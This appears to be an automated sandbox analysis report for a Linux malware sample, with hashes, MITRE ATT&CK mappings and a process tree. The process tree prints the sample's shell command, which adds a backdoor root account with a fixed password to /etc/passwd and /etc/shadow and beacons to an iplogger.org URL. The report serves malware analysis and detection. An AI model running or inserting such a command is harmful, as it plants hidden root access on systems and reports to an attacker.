49a07fd7adedfa08cec51d3218330a015415189a1441af2b74ff92017b7b7d52

Analysis

max time kernel
0s
max time network
135s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
18-09-2024 04:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e8608ef6763ff36be35de1730a46578b_JaffaCakes118
Size

12KB
MD5

e8608ef6763ff36be35de1730a46578b
SHA1

6488de14684b3a16eeb7c81787a4e9ee6781f654
SHA256

49a07fd7adedfa08cec51d3218330a015415189a1441af2b74ff92017b7b7d52
SHA512

bdbe9bca66c675e25126beb7cdf669f50032fdcff76804c5609d348126ba611937c250ea64f3b2f92561f0f524a64b89e5d3a05a3e426dd727cc198143c1e095
SSDEEP

192:GRZVaN4vYrySXfvG0LBqy2iSNpIaE98/G:YaNV+SvvGERAOL9t

Score

8^/10

credential_access defense_evasion discovery persistence

Malware Config

Signatures

Modifies password files for system users/ groups 1 TTPs 2 IoCs

Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.

persistence credential_access defense_evasion

Pluggable Authentication Modules

T1556.003

description	ioc	Process
File opened for modification	/etc/passwd	sh
File opened for modification	/etc/shadow	sh

OS Credential Dumping 1 TTPs 1 IoCs

Adversaries may attempt to dump credentials to use it in password cracking.

credential_access

/etc/passwd and /etc/shadow

T1003.008

description	ioc	Process
File opened for reading	/etc/shadow	chpasswd

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	iplogger.org
3	iplogger.org
4	iplogger.org

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/kernel/cap_last_cap	chpasswd
File opened for reading	/proc/filesystems	chpasswd
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
2826	sh
2832	curl

/tmp/e8608ef6763ff36be35de1730a46578b_JaffaCakes118
/tmp/e8608ef6763ff36be35de1730a46578b_JaffaCakes118
1⤵
PID:2825
- /bin/sh
  sh -c -- "echo 'root5:x:0:0:defaultsystem:/root:/bin/bash' >> /etc/passwd; echo 'root5:123:18020:0:99999:7:::' >> /etc/shadow;echo 'root5:asd123asd' | chpasswd;curl https://iplogger.org/2dLvf5 2>/dev/null"
  2⤵
  - Modifies password files for system users/ groups
  - System Network Configuration Discovery
  PID:2826
- - /usr/sbin/chpasswd
    chpasswd
    3⤵
    - OS Credential Dumping
    - Reads runtime system information
    PID:2829
- - /usr/bin/curl
    curl https://iplogger.org/2dLvf5
    3⤵
    - Reads runtime system information
    - System Network Configuration Discovery
    PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

Privilege Escalation

Defense Evasion

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

Credential Access

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

OS Credential Dumping

T1003

/etc/passwd and /etc/shadow

T1003.008

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/nshadow

Filesize
1KB

MD5
1979d591413154f9711e4ab1da293a2b

SHA1
9f0fcf04e3792cc5033260e2ef60c9d49d442048

SHA256
9bbd37af4942c96d40547d5625b6dccf6eae9e4f14442d06d0ee09940a40d69a

SHA512
146d6cf66ab76a46a3eb41560d93e2facfea548ef440425e9616ee5628ee0553a0e8f0777ec67f8a078d9130fa08a43274ffe1a8ff0ebe1a78b4641c1020e1e2

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads